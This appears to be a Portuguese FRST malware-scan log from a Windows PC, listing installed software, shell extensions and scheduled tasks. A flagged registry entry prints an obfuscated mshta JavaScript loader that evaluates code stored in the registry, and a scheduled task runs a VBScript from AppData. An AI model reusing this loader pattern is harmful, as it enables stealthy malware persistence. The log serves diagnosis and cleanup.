Cheat Engine 6.5.1 (HKLM-x32\...\Cheat Engine 6.5.1_is1) (Version:  - Cheat Engine)
Cheat Engine 6.6 (HKLM-x32\...\Cheat Engine 6.6_is1) (Version:  - Cheat Engine)
Consolas Font Family (HKLM-x32\...\{6AE22174-4FFA-4572-B692-31F0C386ED38}) (Version: 1.00.0000 - Microsoft Corporation)
DAEMON Tools Ultra (HKLM\...\DAEMON Tools Ultra) (Version: 4.1.0.0489 - Disc Soft Ltd)
Dark Souls III (HKLM-x32\...\Dark Souls III_is1) (Version:  - )
Dell Customer Connect (HKLM-x32\...\{124DE80C-9BFE-4D04-A8D9-69C5019DEEBF}) (Version: 1.3.28.0 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{BC8233D8-59BA-4D40-92B9-4FDE7452AA8B}) (Version: 3.0.3999.0 - Dell Products, LP)
Dell Foundation Services (HKLM\...\{C1C53DA1-9497-4ABB-A3D6-A63039820B37}) (Version: 3.3.7200.0 - Dell Inc.)
Dell Foundation Services (HKLM\...\{D605CD24-103D-4DB6-B572-653851213C46}) (Version: 2.2.65.0 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\{24F2AD94-CC1B-4294-B184-D4D31A3186A7}) (Version: 2.42.0012 - Aviata Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 2.0.6875.402 - Dell)
Dell SupportAssistAgent (HKLM\...\{90881C8E-6C4F-4662-9923-85AFCA058C44}) (Version: 2.0.1.7 - Dell)
Dell System Detect (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.55 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Diablo III (HKLM-x32\...\Diablo III) (Version:  - Blizzard Entertainment)
Discord (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dont Starve - Shipwrecked (HKLM-x32\...\Dont Starve - Shipwrecked_is1) (Version:  - )
Driver Booster 4.4 (HKLM-x32\...\Driver Booster_is1) (Version: 4.4.0 - IObit)
Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 0.9.0 - Dropbox, Inc.)
Duplicate Cleaner Pro 4.0.3 (HKLM-x32\...\Duplicate Cleaner Pro) (Version: 4.0.3 - DigitalVolcano Software Ltd)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Fallout 4 (HKLM-x32\...\Fallout 4_is1) (Version:  - )
FreeMouseAutoClicker 3.8.2 (HKLM-x32\...\{292F00C5-25EF-4FBE-9873-13EF1F69DEED}_is1) (Version:  - Advanced Mouse Auto Clicker ltd.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 59.0.3071.115 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of Might and Magic V - Tribes of the East (HKLM-x32\...\1207661193_is1) (Version: 2.1.0.24 - GOG.com)
Heroes of Might and Magic V with Hammers of Fate (HKLM-x32\...\1207661143_is1) (Version: 2.1.0.22 - GOG.com)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.6.0.1045 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.5.0.1056 - Intel Corporation)
Intel® Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Intel® WiDi (HKLM\...\{2F97FBC6-7992-4DF7-A7C7-B68455E307F7}) (Version: 5.1.20.0 - Intel Corporation)
Intel® Wireless Bluetooth® (HKLM-x32\...\{E2FEF167-A654-48D5-BA41-0C3B5B91FE4E}) (Version: 18.1.1546.2762 - Intel Corporation)
IObit Malware Fighter 5 (HKLM-x32\...\IObit Malware Fighter_is1) (Version: 5.1 - IObit)
IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 6.4.0.2119 - IObit)
Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
Kerbal Space Program (HKLM-x32\...\1429864849_is1) (Version: 2.4.0.6 - GOG.com)
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.1.5.8 - PandoraTV)
Malwarebytes versão 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Mass Effect™: Andromeda (HKLM-x32\...\{72BBCA87-9350-48BC-9E2F-6DBC1E80C993}) (Version: 1.0.0.4 - Electronic Arts)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.7.8942.2 - Waves Audio Ltd.) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Might & Magic Heroes VII Update v1.3 (HKLM\...\TWlnaHRNYWdpY0hlcm9lc1ZJSQ==_is1) (Version: 1 - )
Might and Magic Heroes VII (HKLM-x32\...\Might and Magic Heroes VII_is1) (Version:  - )
MobiKin Doctor for Android (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\MobiKin Doctor for Android) (Version: 3.0.19 - MobiKin)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.14 - Black Tree Gaming)
Nox APP Player (HKLM-x32\...\Nox) (Version: 3.8.3.1 - Duodian Technology Co. Ltd.)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{1D464EFF-EC8B-F225-2F74-F74143200DDF}) (Version: 1.00.0000 - Nome de sua empresa:)
Pacote de Driver do Windows - Intel Corporation (iaStorA) HDC  (04/21/2016 14.8.9.1053) (HKLM\...\CD9B4AE79021660F0D350F3B47AF8FEB680EC9D0) (Version: 04/21/2016 14.8.9.1053 - Intel Corporation)
Pacote de Driver do Windows - Intel Corporation (iaStorA) SCSIAdapter  (04/21/2016 14.8.9.1053) (HKLM\...\6973B84EB0AFD7F3DF921DBA71F34B6AFAFB5ED7) (Version: 04/21/2016 14.8.9.1053 - Intel Corporation)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2-r5875) (Version:  - )
Pcsx2 0.9.1 Watermoose (HKLM-x32\...\Pcsx2_is1) (Version:  - Pcsx2 Team)
PX Profile Update (HKLM-x32\...\{79DB4FB1-2556-27C8-C606-1A0DD3E315B9}) (Version: 1.00.1. - AMD) Hidden
qBittorrent 3.3.13 (HKLM-x32\...\qBittorrent) (Version: 3.3.13 - The qBittorrent project)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.16.014 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31233 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 10.3.723.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
ScpToolkit (HKLM\...\{AC052048-9828-45E3-872B-04CE30A3B58B}) (Version: 1.6.238.16010 - Nefarius Software Solutions)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.24 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.24.104 - Skype Technologies S.A.)
Smart Defrag 5 (HKLM-x32\...\Smart Defrag_is1) (Version: 5.6.0 - IObit)
Software de dispositivo do Chipset Intel® (HKLM-x32\...\{bb0592a7-5772-4736-9d55-2402740085db}) (Version: 10.1.1.38 - Intel® Corporation) Hidden
Software Intel® PROSet/Wireless (HKLM-x32\...\{638b58cc-a268-482a-b0b2-4f2e25993cc1}) (Version: 19.20.0 - Intel Corporation)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Stremio (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Stremio) (Version: 3.6.5 - Smart Code Ltd.)
Superb Game Boost 3.1 (HKLM-x32\...\SuperbGameBoost_is1) (Version: 3.1 - )
The Elder Scrolls Legends (HKLM-x32\...\The Elder Scrolls Legends) (Version:  - Bethesda Softworks)
The Elder Scrolls V Skyrim - Legendary Edition (HKLM-x32\...\The Elder Scrolls V Skyrim - Legendary Edition_is1) (Version:  - )
True Color (HKLM\...\{33D499E3-73E8-44D5-8D1F-FEA39535E9F2}) (Version: 6.0.0.6 - Entertainment Experience LLC) Hidden
True Color (HKLM-x32\...\{55c734b2-fcff-447e-81cc-a6f04ebf09fc}) (Version: 6.0.0.6 - Entertainment Experience)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
 
==================== Exame Personalizado CLSID (Whitelisted): ==========================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{eb3bea66-c477-47e4-bd03-3fd09f2e436f}\InprocServer32 -> C:\WINDOWS\system32\dfshim.dll (Microsoft Corporation)
HKU\.DEFAULT\Software\Classes\15c1c1c: "C:\WINDOWS\system32\mshta.exe" "javascript:V0Mr2W="RZ9A6Jb";N2n=new ActiveXObject("WScript.Shell");rPtAR52="GaXZcEtG";Pf8X9X=N2n.RegRead("HKCU\\software\\jgsxvl\\ehwentqye");jpOrbSG1="p";eval(Pf8X9X);El3JI="uLK";" <==== ATENÇÃO
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} =>  -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} =>  -> Nenhum Arquivo
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers1: [DaemonShellExtImage] -> {40966797-8FFE-46C8-9EF8-7003F33CCF0F} => C:\Program Files (x86)\DAEMON Tools Pro\DTShl64.dll [2012-10-23] (DT Soft Ltd)
ContextMenuHandlers1: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll [2017-03-31] (IObit)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2017-03-28] (IObit)
ContextMenuHandlers1: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\WINDOWS\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-03-09] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-03-09] (Alexander Roshal)
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers2: [DaemonShellExtDrive] -> {A5415364-784A-41A5-B47A-D452909CA8FF} => C:\Program Files (x86)\DAEMON Tools Pro\DTShl64.dll [2012-10-23] (DT Soft Ltd)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-01-20] (Malwarebytes)
ContextMenuHandlers4: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers4: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll [2017-03-31] (IObit)
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2017-03-28] (IObit)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Nenhum Arquivo
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-02-24] (Intel Corporation)
ContextMenuHandlers6: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll [2017-03-31] (IObit)
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2017-03-28] (IObit)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-01-20] (Malwarebytes)
ContextMenuHandlers6: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\WINDOWS\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-03-09] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-03-09] (Alexander Roshal)
 
==================== Tarefas Agendadas (Whitelisted) =============
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
Task: {0945814C-4757-45B6-8369-9182A6714E49} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {1A1ADE13-9829-4331-9213-7764F1E76D34} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Nenhum Arquivo <==== ATENÇÃO
Task: {29938D73-1F8C-4C26-8A3B-B5A49EEE09B6} - System32\Tasks\IObitSelfCheckTask => C:\Program Files (x86)\IObit\Smart Defrag\IObitSelfCheck.exe [2016-10-18] (IObit)
Task: {2AD8317F-D205-44E5-AE59-0781E8ACE7D5} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {2C956927-78EB-4437-8471-7530240E4BBF} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2017-05-29] (PC-Doctor, Inc.)
Task: {2DE7CC42-509D-40D8-A88C-D734E9CAB83F} - System32\Tasks\Dell\Dell Product Registration Update => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-10-31] (Aviata Inc)
Task: {2E3F8A75-7964-4ABE-BC83-0A4AC675FB89} - System32\Tasks\Dell\Dell Product Registration => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-10-31] (Aviata Inc)
Task: {312476A3-96F6-480C-AA9F-1426AEBEE259} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssist.exe [2017-06-28] (Dell Inc.)
Task: {34FB3448-893F-493D-ABD7-09D4BDFF762B} - System32\Tasks\{92CF0002-651B-43D2-8151-C19D7B8F7290} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3BFFF2D2-D819-4EFB-AEA7-37F7FA841A7C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {3D512BEF-0952-46F2-9FF9-8644AD67DA69} - System32\Tasks\ASC10_SkipUac_Hercílio => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [2017-05-31] (IObit)
Task: {4802EE1A-6850-4BED-B2B5-D9C57716FBC8} - System32\Tasks\ASC10_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [2017-03-22] (IObit)
Task: {52A8E670-E955-4CA8-8174-0C75380E8481} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2017-07-14] (Realtek Semiconductor)
Task: {52B6D137-35A4-412E-B84F-405779A4C1BA} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-10-13] (Intel® Corporation)
Task: {538DCEB1-FD32-444F-B278-E6457C101F82} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {55CE1D81-E387-4B19-B73E-14252D65ED9F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {6693575E-E075-4877-8C64-BE2D6066ACC5} - System32\Tasks\Driver Booster SkipUAC (Hercílio) => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe [2017-05-03] (IObit)
Task: {69E8BADB-4394-4892-87DF-C5A9163071CA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {8DBC6239-677F-4B5F-A513-81FB4E682BAD} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {8EAEE3FC-0BF1-432E-B16C-1496A8A5A5D6} - System32\Tasks\SuperbGameBoost => C:\Program Files (x86)\SuperBoost\Superb Game Boost\SuperbGameBoostMain.exe [2016-11-28] (SuperBoost Software)
Task: {90E7B9D3-2AEE-4EFD-90D9-033646021662} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-05-29] (PC-Doctor, Inc.)
Task: {A3579897-8536-404D-94D2-EF1EF79E9AE5} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {A8213CD5-D9EF-4E86-AB53-6596AE36500C} - System32\Tasks\{A493C15F-E0DF-44CC-B7FE-7D53EFDA7A50} => "c:\program files (x86)\google\chrome\application\chrome.exe" hxxp://ui.skype.com/ui/0/7.24.85.104/pt/abandoninstall?page=tsMain
Task: {A9CDABCE-90E9-4EAA-8B26-ACCA1D6BBA1E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {AE535F27-94A0-4DE8-A25F-8632948727EB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {AFC57FD1-0D40-42B3-8331-34813833DAF8} - System32\Tasks\SmartDefrag_Startup => C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe [2017-05-31] (IObit)
Task: {B80159A1-5CFF-47F5-8159-DD903066A604} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {B881CCAE-FDE4-44BE-B0D1-438C58A1C28F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {BB126EF1-ED45-4488-94F7-68FDD49DDFD3} - System32\Tasks\SmartDefrag_Update => C:\Program Files (x86)\IObit\Smart Defrag\AutoUpdate.exe [2017-05-25] (IObit)
Task: {BBC15184-8EAE-491B-8DE9-71D8B6B3C969} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\Scheduler.exe [2017-03-28] (IObit)
Task: {C1494A47-EA61-45D0-85D3-F062A5A2F0EB} - System32\Tasks\updater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [2016-01-10] (Nefarius Software Solutions)
Task: {C57EDBA8-602A-4631-9957-4528976086C7} - System32\Tasks\PCDoctorBackgroundMonitorTask-Delay => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-05-29] (PC-Doctor, Inc.)
Task: {CD8EEB4C-84BA-4A56-88E3-0C3A8DDDA256} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {D52EB235-BE84-4E14-8C8B-FE88D28618A9} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {DC6E9AF2-310F-4A8B-8AB1-C9B33FA63496} - System32\Tasks\{FB1438C9-653B-4FD0-A4F5-559B9D954CCC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Pcsx2\pcsx2.exe" -d "C:\Program Files (x86)\Pcsx2"
Task: {E57248BA-7C3C-4415-AC77-EFF6C0603EE4} - System32\Tasks\SmartDefrag_AutoAnalyze => C:\Program Files (x86)\IObit\Smart Defrag\AutoDefrag.exe [2016-06-06] (IObit)
Task: {EA230FE4-0415-4E21-A56D-50F45B384B30} - System32\Tasks\RealtekUpdate => wscript "C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\RealtekUpdate.vbs"
Task: {F0F348D7-F6A1-4302-ABB4-556EA06B6589} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {F56B5354-CBEB-4CB7-8501-6C949C19FF18} - System32\Tasks\Uninstaller_SkipUac_Hercílio => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2017-05-26] (IObit)
Task: {FC9611C2-2800-4682-9E20-5B6F1EE63E69} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {FE2164E5-7A28-4066-A1EC-6CF686DDBF4D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
 
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
 
Task: C:\WINDOWS\Tasks\RunDFS.job => cmd /c sc start Dell Foundation ServicesWORKGROUP PC NETINHO 07
